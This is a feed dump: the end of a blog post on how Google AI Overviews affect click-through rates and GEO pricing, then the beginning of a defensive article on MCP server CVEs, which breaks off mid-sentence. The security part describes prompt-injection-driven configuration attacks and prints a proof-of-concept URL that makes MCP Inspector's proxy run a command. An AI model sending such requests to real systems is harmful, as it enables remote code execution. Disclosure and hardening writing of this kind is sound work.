&lt;p&gt;Seer is careful about causation, and so are we. Their stated limit: "We cannot claim causation. Higher-authority brands are also more likely to be cited." Any agency telling you citations cause clicks is overselling a correlation. What the data supports is narrower and still useful: on pages where an AI Overview appears, cited brands consistently outperformed uncited ones every single month of 2025.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 2026 reversal nobody predicted
&lt;/h2&gt;

&lt;p&gt;Here is the part that should change your budget conversation.&lt;/p&gt;

&lt;p&gt;Through 2025, every forecast pointed down. Seer's own regression model, built on twelve months of 2025 data, projected continued decline into 2026. It was wrong, in the useful direction. Organic CTR on AI-Overview-present queries fell to a floor of 1.31% in December 2025, then climbed to 2.33% in January 2026 and 2.36% in February 2026. That is an 85% recovery in two months, and every informational and transactional organic segment beat the model's projection in both months.&lt;/p&gt;

&lt;p&gt;Non-AI-Overview queries moved too, from 2.75% organic CTR in January 2025 to 3.82% in February 2026.&lt;/p&gt;

&lt;p&gt;The strategic reading is not "we won." It is that a straight-line 2025 extrapolation is now a bad planning assumption in both directions. If your agency's 2026 proposal is built on "traffic will keep collapsing, so pay us to hedge," that model has already been falsified by the most recent data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where AI Overviews actually appear
&lt;/h2&gt;

&lt;p&gt;Exposure is not uniform, and this is where most content budgets are misallocated. Seer classified 49,353 distinct queries by intent:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Query intent&lt;/th&gt;
&lt;th&gt;AI Overview prevalence&lt;/th&gt;
&lt;th&gt;What it means for you&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Informational&lt;/td&gt;
&lt;td&gt;36%&lt;/td&gt;
&lt;td&gt;Roughly 1 in 3 of your how-to and what-is queries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Commercial&lt;/td&gt;
&lt;td&gt;8%&lt;/td&gt;
&lt;td&gt;Brand evaluation queries largely intact, for now&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transactional&lt;/td&gt;
&lt;td&gt;5%&lt;/td&gt;
&lt;td&gt;Under 1 in 20; Shopping and Maps still own these SERPs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The 7x gap between informational and transactional exposure is the single most actionable fact in the study. If your organic programme is built on how-tos and comparisons, a third of it sits in AI Overview territory. If you sell through transactional queries, you have meaningful protection at current levels.&lt;/p&gt;

&lt;p&gt;Drill into query shape and it gets sharper:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Query type&lt;/th&gt;
&lt;th&gt;AI Overview rate&lt;/th&gt;
&lt;th&gt;Organic impressions tracked&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Comparison (X vs Y)&lt;/td&gt;
&lt;td&gt;95.4%&lt;/td&gt;
&lt;td&gt;79,436&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Review queries&lt;/td&gt;
&lt;td&gt;86.3%&lt;/td&gt;
&lt;td&gt;21,221&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Question (what/why/how/is/are)&lt;/td&gt;
&lt;td&gt;85.9%&lt;/td&gt;
&lt;td&gt;1,408,843&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Price / cost / buy&lt;/td&gt;
&lt;td&gt;83.4%&lt;/td&gt;
&lt;td&gt;192,911&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best of&lt;/td&gt;
&lt;td&gt;81.3%&lt;/td&gt;
&lt;td&gt;105,279&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Near me&lt;/td&gt;
&lt;td&gt;76.9%&lt;/td&gt;
&lt;td&gt;188,606&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Single word&lt;/td&gt;
&lt;td&gt;27.3%&lt;/td&gt;
&lt;td&gt;25,042,440&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Comparison pages trigger an AI Overview 95.4% of the time. If your content strategy runs on "X vs Y" posts, that traffic is already AI-Overview-affected, and the only question is whether you are the source being quoted or the site being summarised past.&lt;/p&gt;

&lt;p&gt;Two findings deserve a second look. "Near me" informational queries show AI Overviews 76.9% of the time, which means Google is layering AI Overviews on top of local SERPs. And single-word queries still trigger them 27.3% of the time across 25 million impressions, so the folk wisdom that short queries are safe does not survive contact with the data.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Google says you can ignore
&lt;/h2&gt;

&lt;p&gt;This is the section most agencies skip, because it deletes half their deliverables. Google's guide to optimizing for generative AI features, last updated 10 July 2026, names the tactics that do nothing for Google Search:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;llms.txt and other special files.&lt;/strong&gt; Google's language: "You don't need to create new machine readable files, AI text files, markup, or Markdown to appear in Google Search (including its generative AI capabilities), as Google Search itself doesn't use them." Maintaining one is fine for other systems, but it "will neither harm nor help your site's visibility or rankings in Google Search, as Google Search ignores them."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Chunking content.&lt;/strong&gt; No requirement to break pages into small pieces. There is no ideal page length.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rewriting content just for AI systems.&lt;/strong&gt; The systems understand synonyms and intent; you do not need every long-tail variation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seeking inauthentic mentions.&lt;/strong&gt; Core ranking systems focus on quality content while other systems block spam.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Overfocusing on structured data.&lt;/strong&gt; Not required for generative AI search, and no special schema.org markup exists for it. Keep using it for rich results, not as a GEO lever.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Google also warns explicitly about the tooling market: "Be wary of third-party tools that promise ranking success or claim to use 'internal' Google metrics. No third-party tool has access to our internal ranking or AI systems."&lt;/p&gt;

&lt;p&gt;We would rather lose a pitch than sell a llms.txt file. If a proposal you are reading prices any of the five items above as a GEO deliverable, that is a reasonable place to end the meeting.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually drives citation
&lt;/h2&gt;

&lt;p&gt;Google's guidance is specific about the mechanism. Generative AI features use retrieval-augmented generation, also called grounding, which relies on core Search ranking systems to retrieve relevant pages from the Search index. It also uses query fan-out: concurrent related queries the model generates to gather more context. Google's own worked example is a user asking "how to fix a lawn that's full of weeds", where fan-out queries might include "best herbicides for lawns" and "remove weeds without chemicals".&lt;/p&gt;

&lt;p&gt;Two consequences follow, and they are the real work.&lt;/p&gt;

&lt;p&gt;First, eligibility is technical. A page must be indexed and eligible to appear in Google Search with a snippet, and the site must be included in Search generative AI features in Search Console. Miss either and content quality is irrelevant.&lt;/p&gt;

&lt;p&gt;Second, the differentiator is non-commodity content. Google draws the line with an example worth quoting because it is unusually concrete: commodity content is "something like '7 Tips for First-Time Homebuyers'", based on common knowledge that "could originate from anyone". Non-commodity content is "such as 'Why We Waived the Inspection &amp;amp; Saved Money: A Look Inside the Sewer Line'", providing "unique expert or experienced takes that go beyond common knowledge and the ordinary".&lt;/p&gt;

&lt;p&gt;That distinction is the entire GEO brief. An AI Overview synthesises common knowledge for free. It cannot synthesise your first-hand data, your benchmark, or your pricing teardown, because those exist nowhere else. The only durable citation strategy is to publish things the model cannot generate without you.&lt;/p&gt;

&lt;p&gt;There is a trap attached. Google's scaled content abuse spam policy explicitly covers creating separate content for every fan-out variation "primarily to manipulate rankings or generative AI responses". The tactic of mass-producing a page per fan-out query is not a clever GEO hack. It is the named violation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The transactional story is more interesting than the informational one
&lt;/h2&gt;

&lt;p&gt;Everyone reports the informational numbers because they are the biggest. The transactional numbers are where the money is, and they moved differently.&lt;/p&gt;

&lt;p&gt;On transactional queries where an AI Overview appeared and the brand was not cited, organic CTR fell from 4.17% to 2.15% across 2025, a 48% decline over 1.73 million organic impressions. Every one of those lost clicks carried purchase intent, which makes the decline more expensive per click than anything happening in the informational band.&lt;/p&gt;

&lt;p&gt;The cited side of the same cohort spent most of 2025 below 1% CTR, bottomed at 0.62% in September 2025, then climbed to 1.65% by December. Seer's summary: transactional queries with an AI Overview and a brand citation roughly doubled organic CTR across the year, from 0.7% in January 2025 to 1.7% in December.&lt;/p&gt;

&lt;p&gt;Two things follow. Transactional exposure is low, at under 5%, so this is a small slice. But within that slice, citation went from irrelevant to worth defending in a single quarter. If you wrote off transactional AI Overview queries in mid-2025, the December data says look again.&lt;/p&gt;

&lt;p&gt;Commercial queries carry a warning attached. Seer found commercial no-AI-Overview organic CTR declined meaningfully across 2025 despite minimal AI Overview exposure. Their conclusion is honest and uncomfortable: "AIO is not the only force compressing organic CTR. Something else is happening in commercial SERPs." Any agency attributing every commercial CTR decline to AI Overviews is telling you a story the data does not support.&lt;/p&gt;

&lt;h2&gt;
  
  
  Paid behaves nothing like organic
&lt;/h2&gt;

&lt;p&gt;Worth knowing before you move budget on a hunch.&lt;/p&gt;

&lt;p&gt;Paid CTR on AI-Overview-present queries held between 13.99% and 17.95% for all of 2025 with no meaningful decline, and reached 16.21% in February 2026. Seer's regression model predicted paid CTR on informational queries to within 0.09 percentage points in January 2026, while missing organic CTR by 0.6 to 2.6 percentage points across every segment.&lt;/p&gt;

&lt;p&gt;The asymmetry is the insight. Paid is predictable because it is structurally depressed and stable. Organic is unpredictable because it is still being reshaped. Paid and organic are operating in different environments on the same page, and a plan that treats them as one system will misprice both.&lt;/p&gt;

&lt;p&gt;The citation premium shows up in paid too: brand-cited paid CTR held a 4-plus percentage point advantage over uncited every single month of 2025.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we build
&lt;/h2&gt;

&lt;p&gt;eCorpIT is a Gurugram technology consultancy founded in 2021, CMMI Level 5 assessed and MSME certified, working across AI, cloud and search. Our GEO and AEO content engagements are deliberately narrow:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Exposure mapping.&lt;/strong&gt; We classify your query set by intent and shape against the prevalence data above, so you know which slice of your programme is in the 36% informational band and which sits in the protected 5% transactional band. This is arithmetic on your own Search Console data, not a vendor score.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Non-commodity content production.&lt;/strong&gt; Original benchmarks, cost teardowns, comparison tables with real numbers, and engineering or category analysis that carries a point of view. Written by people who have done the work, because Google's stated bar is first-hand experience over restatement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technical eligibility.&lt;/strong&gt; Indexing, snippet eligibility, Search Console generative AI feature inclusion, crawlability, page experience, and structured data for rich results. Unglamorous and load-bearing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Measurement that separates clicks from impressions.&lt;/strong&gt; Seer found an instructive trap here: informational brand-cited CTR fell 52.1% in October 2025 and looked like a catastrophe, but clicks were flat at roughly 400,000 while impressions more than doubled from 15.8 million to 33.1 million. The brands had earned citations on more queries. The CTR fell because the denominator grew. Report CTR alone and you will fire a team that just succeeded.&lt;/p&gt;

&lt;p&gt;For related reading, see our &lt;a href="https://ecorpit.com/blog/aeo-vs-geo-vs-seo-complete-guide/" rel="noopener noreferrer"&gt;complete guide to AEO, GEO and SEO&lt;/a&gt;, the &lt;a href="https://ecorpit.com/blog/geo-platform-playbook-chatgpt-perplexity-ai-overviews-2026/" rel="noopener noreferrer"&gt;GEO platform playbook for ChatGPT, Perplexity and AI Overviews&lt;/a&gt;, and our analysis of &lt;a href="https://ecorpit.com/blog/ranking-one-no-clicks-geo-fixes-2026/" rel="noopener noreferrer"&gt;ranking first and still getting no clicks&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;Indian GEO and AEO retainers sit between ₹75,000 and ₹3,50,000 per month for mid-market engagements, with enterprise scope crossing ₹5,00,000 for multi-brand or multi-market work, per upGrowth's 2026 pricing benchmark. Project-based audits run ₹1,50,000 to ₹8,00,000 depending on depth and platform coverage. YMYL categories including fintech, healthcare, legal and insurance carry a 20% to 35% premium, because sourcing and authority requirements are heavier.&lt;/p&gt;

&lt;p&gt;A useful sanity check on any Indian GEO quote: ask what percentage of the retainer is content production versus tooling and reporting. Given that Google says no third-party tool has access to its ranking or AI systems, a retainer weighted toward dashboards is buying you visibility into a problem rather than progress against it.&lt;/p&gt;

&lt;p&gt;Where content touches personal data, the Digital Personal Data Protection Act 2023 applies to your forms and analytics regardless of search strategy. We design applications aligned with DPDP Act requirements. See our &lt;a href="https://ecorpit.com/blog/dpdp-compliance-cost-indian-startups-2027-deadline/" rel="noopener noreferrer"&gt;DPDP compliance cost guide for Indian startups&lt;/a&gt; for the November 2026 and May 2027 timelines.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who this is not for
&lt;/h2&gt;

&lt;p&gt;Honest scoping saves everyone a quarter.&lt;/p&gt;

&lt;p&gt;If your traffic is 90% transactional and branded, AI Overview exposure is around 5% and you do not need a GEO retainer. Spend the money on conversion rate work.&lt;/p&gt;

&lt;p&gt;If you want a guaranteed citation count, no one can sell you that truthfully. Google does not guarantee crawling, indexing or serving even for pages that meet every requirement.&lt;/p&gt;

&lt;p&gt;If your plan is to publish 200 thin pages against fan-out queries, we will decline. That is the scaled content abuse policy, and it is a poor use of ₹1,50,000 a month besides.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Is GEO different from SEO?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not according to Google. Its guidance updated on 10 July 2026 states that optimizing for generative AI search is optimizing for the search experience, and thus still SEO. Generative AI features are rooted in core Search ranking and quality systems. The label is new; the underlying work of indexing, quality and authority is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much is an AI Overview citation actually worth?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Seer Interactive's April 2026 study found being cited delivers 120% more organic clicks per impression than not being cited on the same page. In absolute terms, roughly 20,743 clicks per million informational impressions when cited versus 9,445 when not. It still underperforms a page with no AI Overview by 38%.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should I create an llms.txt file?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not for Google Search. Google states plainly that it does not use llms.txt or similar machine-readable files, and that maintaining one will neither harm nor help visibility or rankings because Google Search ignores them. It is fine to keep one for other services, but it should not be a priced GEO deliverable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which of my pages are most exposed to AI Overviews?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Comparison pages first, at a 95.4% AI Overview rate across Seer's tracked queries. Then review queries at 86.3% and question-format queries at 85.9%. By intent, informational queries show AI Overviews 36% of the time versus 5% for transactional. Audit comparison and question-format pages before anything else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is AI search traffic still declining in 2026?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No, and this is recent. After 18 months of decline, organic CTR on AI-Overview queries rose from a 1.31% floor in December 2025 to 2.36% in February 2026, an 85% recovery. Every informational and transactional organic segment beat Seer's projection model in January and February 2026.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does structured data help me get cited?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Structured data is not required for generative AI search, and Google says there is no special schema.org markup for it. Keep using it, because it makes you eligible for rich results in normal Search. Treat it as standard SEO hygiene rather than a citation lever, and be sceptical of pricing built around it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What does a GEO retainer cost in India?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Mid-market retainers run ₹75,000 to ₹3,50,000 per month, with enterprise multi-brand scope above ₹5,00,000, per upGrowth's 2026 benchmark. Project audits are ₹1,50,000 to ₹8,00,000. Fintech, healthcare, legal and insurance carry a 20% to 35% premium for heavier sourcing and authority requirements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why did my cited-page CTR drop even though nothing broke?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Probably because impressions grew faster than clicks. Seer recorded a 52.1% one-month CTR fall in October 2025 where clicks held near 400,000 but impressions doubled from 15.8 million to 33.1 million. The brands earned citations on more queries. Always read clicks and impressions separately before concluding anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT builds GEO and AEO content programmes around the two things the 2026 data actually supports: technical eligibility for generative AI features, and non-commodity content that an AI Overview cannot produce without citing you. Our senior engineering and editorial teams work from your Search Console data rather than a vendor score, and we will tell you plainly if your query mix does not justify the spend. We are a multi-disciplinary organisation based in Gurugram, founded in 2021, CMMI Level 5 assessed. &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;Talk to us&lt;/a&gt; about an exposure map for your query set before you commit to a retainer.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://www.seerinteractive.com/blog/aio-impact-on-google-ctr-2026-update" rel="noopener noreferrer"&gt;AIO Impact on Google CTR: 2026 Update&lt;/a&gt; — Seer Interactive, 24 April 2026.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/fundamentals/ai-optimization-guide" rel="noopener noreferrer"&gt;Optimizing your website for generative AI features on Google Search&lt;/a&gt; — Google Search Central, updated 10 July 2026.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.seerinteractive.com/blog/aio-impact-on-google-ctr-september-2025-update" rel="noopener noreferrer"&gt;AIO Impact on Google CTR: September 2025 Update&lt;/a&gt; — Seer Interactive, 4 November 2025.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.seerinteractive.com/blog/how-ai-overviews-are-impacting-ctr-5-initial-takeaways" rel="noopener noreferrer"&gt;How AI Overviews Are Impacting CTR: 5 Initial Takeaways&lt;/a&gt; — Seer Interactive.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/appearance/ai-features" rel="noopener noreferrer"&gt;AI features and your website&lt;/a&gt; — Google Search Central.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/fundamentals/creating-helpful-content" rel="noopener noreferrer"&gt;Creating helpful, reliable, people-first content&lt;/a&gt; — Google Search Central.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/essentials/spam-policies#scaled-content" rel="noopener noreferrer"&gt;Spam policies for Google web search: scaled content abuse&lt;/a&gt; — Google Search Central.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/fundamentals/third-party-seo" rel="noopener noreferrer"&gt;Guidance on third-party SEO tools and advice&lt;/a&gt; — Google Search Central.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.google.com/search/docs/essentials/technical" rel="noopener noreferrer"&gt;Google Search Essentials: technical requirements&lt;/a&gt; — Google Search Central.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.searchenginejournal.com/googles-new-ai-search-guide-calls-aeo-and-geo-still-seo/575026/" rel="noopener noreferrer"&gt;Google's New AI Search Guide Calls AEO And GEO 'Still SEO'&lt;/a&gt; — Search Engine Journal.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://upgrowth.in/geo-aeo-pricing-benchmark-india-2026/" rel="noopener noreferrer"&gt;GEO AEO Pricing India 2026: Real Retainer Costs&lt;/a&gt; — upGrowth.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.seerinteractive.com/people/team/tracy-mcdonald" rel="noopener noreferrer"&gt;Tracy McDonald, Product Development Lead&lt;/a&gt; — Seer Interactive.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://support.google.com/webmasters/answer/16984139" rel="noopener noreferrer"&gt;Generative AI performance report&lt;/a&gt; — Google Search Console Help.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: 16 July 2026.&lt;/p&gt;

</description>
      <category>geo</category>
    </item>
    <item>
      <title>11 MCP server CVEs in 2026: the hardening configs that stop them</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 20:51:00 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/11-mcp-server-cves-in-2026-the-hardening-configs-that-stop-them-35gk</link>
      <guid>https://dev.to/mr_manushukla/11-mcp-server-cves-in-2026-the-hardening-configs-that-stop-them-35gk</guid>
      <description>&lt;h1&gt;
  
  
  11 MCP server CVEs in 2026: the hardening configs that stop them
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; On 20 April 2026, OX Security published research describing 11 CVEs across Model Context Protocol implementations, affecting more than 7,000 publicly accessible servers and packages totalling over 150 million downloads. The root cause is not a bug in one library. It is how the STDIO transport turns configuration data into executed commands, and it reaches Python, TypeScript, Java and Rust alike because it sits in Anthropic's reference SDK. Anthropic declined to change the protocol architecture, calling the behaviour expected. That decision moves the entire burden onto you, the operator. The precedent was set a year earlier: CVE-2025-49596 hit the MCP Inspector at CVSS 9.4 on 13 June 2025, and CVE-2025-6514 hit mcp-remote at CVSS 9.6 across 437,000 downloads. For Indian data fiduciaries the arithmetic is sharper still, because failure to maintain reasonable security safeguards under the DPDP Act carries a penalty of up to ₹250 crore. The controls below are the ones the MCP specification actually mandates, written as configuration rather than advice.&lt;/p&gt;

&lt;h2&gt;
  
  
  What OX Security found in April 2026
&lt;/h2&gt;

&lt;p&gt;The research, published on 20 April 2026 by OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok and Roni Bar, is blunt about the impact:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"This flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The finding is a design property, not an implementation slip. MCP servers launched over STDIO take a command string and arguments from configuration and hand the resulting process handle back to the model. If the command starts a working STDIO server, you get a handle. If it does not, the command still runs, and you get an error afterwards. The execution happens either way. That is the whole flaw, and it is why the same core issue keeps producing new CVE numbers in different projects.&lt;/p&gt;

&lt;p&gt;OX Security grouped the resulting attacks into four shapes:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Unauthenticated and authenticated command injection via MCP STDIO.&lt;/li&gt;
&lt;li&gt;Unauthenticated command injection via direct STDIO configuration, bypassing hardening.&lt;/li&gt;
&lt;li&gt;Unauthenticated command injection via MCP configuration edits driven by zero-click prompt injection.&lt;/li&gt;
&lt;li&gt;Unauthenticated command injection through MCP marketplaces, where a network request triggers a hidden STDIO configuration.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The fourth shape is the one that turns a local developer problem into a supply chain problem. OX Security's own summary of why it spread put it this way:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"What made this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anthropic's position, as reported by The Hacker News on 20 April 2026, is that the behaviour is expected. Some downstream vendors have patched. The reference implementation has not changed. If you run MCP servers, you inherit the risk and you own the mitigation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 11 CVEs, and what they have in common
&lt;/h2&gt;

&lt;p&gt;Every entry below traces to the same STDIO configuration-to-execution path. The projects differ; the mechanism does not.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Affected project&lt;/th&gt;
&lt;th&gt;Patch status (as of 20 April 2026)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2025-65720&lt;/td&gt;
&lt;td&gt;GPT Researcher&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30623&lt;/td&gt;
&lt;td&gt;LiteLLM&lt;/td&gt;
&lt;td&gt;Patched&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30624&lt;/td&gt;
&lt;td&gt;Agent Zero&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30618&lt;/td&gt;
&lt;td&gt;Fay Framework&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-33224&lt;/td&gt;
&lt;td&gt;Bisheng&lt;/td&gt;
&lt;td&gt;Patched&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30617&lt;/td&gt;
&lt;td&gt;Langchain-Chatchat&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30625&lt;/td&gt;
&lt;td&gt;Upsonic&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-30615&lt;/td&gt;
&lt;td&gt;Windsurf&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-26015&lt;/td&gt;
&lt;td&gt;DocsGPT&lt;/td&gt;
&lt;td&gt;Patched&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2026-40933&lt;/td&gt;
&lt;td&gt;Flowise&lt;/td&gt;
&lt;td&gt;Unpatched at disclosure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;OX Security also names a set of earlier, independently reported vulnerabilities built on the same core issue: CVE-2025-49596 in MCP Inspector, CVE-2026-22252 in LibreChat, CVE-2026-22688 in WeKnora, CVE-2025-54994 in &lt;a class="mentioned-user" href="https://dev.to/akoskm"&gt;@akoskm&lt;/a&gt;/create-mcp-server-stdio, and CVE-2025-54136 in Cursor. Five separate research efforts arrived at the same door.&lt;/p&gt;

&lt;p&gt;The practical reading for a platform team: patching individual packages is necessary and insufficient. A patched LiteLLM does not protect you from the next agent framework that wires configuration straight into a subprocess. You have to contain the pattern, not chase the instances.&lt;/p&gt;

&lt;h2&gt;
  
  
  The MCP Inspector precedent: CVE-2025-49596
&lt;/h2&gt;

&lt;p&gt;The clearest worked example predates the OX Security research by ten months, and it is worth understanding because the fix Anthropic shipped is the template for everything else.&lt;/p&gt;

&lt;p&gt;Oligo Security reported a remote code execution and DNS rebinding vulnerability in MCP Inspector to Anthropic on 18 April 2025. Anthropic noted that another researcher had reported it on 26 March 2025. CVE-2025-49596 was published on 13 June 2025 with a CVSS score of 9.4.&lt;/p&gt;

&lt;p&gt;Anthropic's advisory text is precise about the cause:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The attack works because MCP Inspector's proxy listened on port 6277 with no authentication, and its &lt;code&gt;/sse&lt;/code&gt; endpoint accepted a &lt;code&gt;command&lt;/code&gt; query parameter and an &lt;code&gt;args&lt;/code&gt; parameter. A request shaped like this was enough:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://0.0.0.0:6277/sse?transportType=stdio&amp;amp;command=touch&amp;amp;args=%2Ftmp%2Fexploited-from-the-browser
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Any public web page running JavaScript could dispatch that request. The reason it reached a service on localhost is the 0.0.0.0-day flaw, a 19-year-old browser inconsistency in how requests to the private network are handled. Oligo Security documented it in 2024 and reported it still unpatched in major browsers as of 2025. Reading a blog post about MCP was enough to get exploited by one.&lt;/p&gt;

&lt;p&gt;Anthropic's fix in 0.14.1 did two things: it added a session token to the proxy by default, following the pattern Jupyter uses, and it added allowed-origins verification, which closes the browser vector outright. Both changes are configuration-level. Neither required rearchitecting the protocol.&lt;/p&gt;

&lt;p&gt;The lesson generalises. The controls that work here are authentication on local services, origin checking, and refusing to treat localhost as a trust boundary.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why STDIO turns configuration into command execution
&lt;/h2&gt;

&lt;p&gt;It helps to be exact about the trust assumption that breaks.&lt;/p&gt;

&lt;p&gt;MCP's STDIO transport was designed so a client could spawn a local server process and talk to it over standard input and output. Spawning a process means running a command. The configuration file that names that command is therefore executable content, not data. Most teams do not treat it that way. They treat &lt;code&gt;mcp.json&lt;/code&gt; or its equivalent the way they treat a &lt;code&gt;.env&lt;/code&gt; file: something you edit, commit, sync, and occasionally accept from a marketplace.&lt;/p&gt;

&lt;p&gt;The MCP specification's own security guidance is explicit about what that enables. It lists two example malicious startup commands:&lt;br&gt;
